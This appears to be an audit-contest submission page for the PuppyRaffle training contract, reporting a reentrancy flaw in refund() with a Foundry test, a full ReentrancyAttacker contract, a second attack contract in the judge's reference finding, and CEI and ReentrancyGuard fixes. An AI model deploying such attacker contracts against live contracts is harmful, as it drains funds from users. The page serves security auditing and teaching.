Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Reentrancy in `refund()` Allows Attacker to Drain All Contract Funds

choco324

Description

The refund() function contains a critical reentrancy vulnerability. It sends ETH to msg.sender before updating the state variable players[playerIndex] to address(0). This violates the Checks-Effects-Interactions (CEI) pattern, allowing a malicious contract to re-enter and drain all ETH from the contract.

function refund(uint256 playerIndex) public {

address playerAddress = players[playerIndex];

require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");

require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");

@> payable(msg.sender).sendValue(entranceFee); // External call BEFORE state update

@> players[playerIndex] = address(0); // State updated AFTER external call

emit RaffleRefunded(playerAddress);

}

The attack flow:

Attacker enters the raffle with a malicious contract address
Attacker calls refund() which triggers sendValue()
The attacker's receive() function is called with the entrance fee
Inside receive(), the attacker calls refund() again
Since players[playerIndex] has not been set to address(0) yet, the check passes
Steps 3-5 repeat until the contract is drained

Risk

Likelihood: High

The vulnerability is straightforward to exploit
No special conditions or timing requirements
Works with any number of legitimate players in the raffle

Impact: Critical

Complete loss of all ETH held in the contract
All legitimate players lose their entrance fees
The protocol becomes insolvent

Proof of Concept

The following test demonstrates the complete drain of the contract:

function test_reentrancyRefund() public {

// 1. Three legitimate players enter the raffle

address[] memory players = new address[](3);

players[0] = playerOne;

players[1] = playerTwo;

players[2] = playerThree;

puppyRaffle.enterRaffle{value: entranceFee * 3}(players);

// 2. Deploy attacker contract

ReentrancyAttacker attacker = new ReentrancyAttacker(puppyRaffle);

vm.deal(address(attacker), entranceFee);

uint256 contractBalanceBefore = address(puppyRaffle).balance;

uint256 attackerBalanceBefore = address(attacker).balance;

console.log("=== Before Attack ===");

console.log("PuppyRaffle balance:", contractBalanceBefore); // 3 ETH

console.log("Attacker balance:", attackerBalanceBefore); // 1 ETH

// 3. Execute the attack

attacker.attack();

uint256 contractBalanceAfter = address(puppyRaffle).balance;

uint256 attackerBalanceAfter = address(attacker).balance;

console.log("\n=== After Attack ===");

console.log("PuppyRaffle balance:", contractBalanceAfter); // 0 ETH

console.log("Attacker balance:", attackerBalanceAfter); // 4 ETH

// 4. Verify the contract was drained

assertEq(contractBalanceAfter, 0, "Contract should be drained");

assertEq(attackerBalanceAfter, 4 ether, "Attacker should have 4 ETH");

}

contract ReentrancyAttacker {

PuppyRaffle public puppyRaffle;

uint256 public entranceFee;

uint256 public attackerIndex;

constructor(PuppyRaffle _puppyRaffle) {

puppyRaffle = _puppyRaffle;

entranceFee = _puppyRaffle.entranceFee();

}

function attack() external payable {

// Enter the raffle

address[] memory players = new address[](1);

players[0] = address(this);

puppyRaffle.enterRaffle{value: entranceFee}(players);

// Get our index

attackerIndex = puppyRaffle.getActivePlayerIndex(address(this));

// Trigger the reentrancy

puppyRaffle.refund(attackerIndex);

}

receive() external payable {

// Keep re-entering until the contract is drained

if (address(puppyRaffle).balance >= entranceFee) {

puppyRaffle.refund(attackerIndex);

}

Run with: forge test --mt test_reentrancyRefund -vvv

Recommended Mitigation

Option 1: Follow CEI Pattern (Recommended)

Update state before making external calls:

function refund(uint256 playerIndex) public {

address playerAddress = players[playerIndex];

require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");

require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");

+ players[playerIndex] = address(0);

+ emit RaffleRefunded(playerAddress);

payable(msg.sender).sendValue(entranceFee);

- players[playerIndex] = address(0);

- emit RaffleRefunded(playerAddress);

}

Option 2: Use ReentrancyGuard

Add OpenZeppelin's ReentrancyGuard modifier:

+ import {ReentrancyGuard} from "@openzeppelin/contracts/security/ReentrancyGuard.sol";

- contract PuppyRaffle is ERC721, Ownable {

+ contract PuppyRaffle is ERC721, Ownable, ReentrancyGuard {

- function refund(uint256 playerIndex) public {

+ function refund(uint256 playerIndex) public nonReentrant {

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 7 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-02] Reentrancy Vulnerability In refund() function

## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!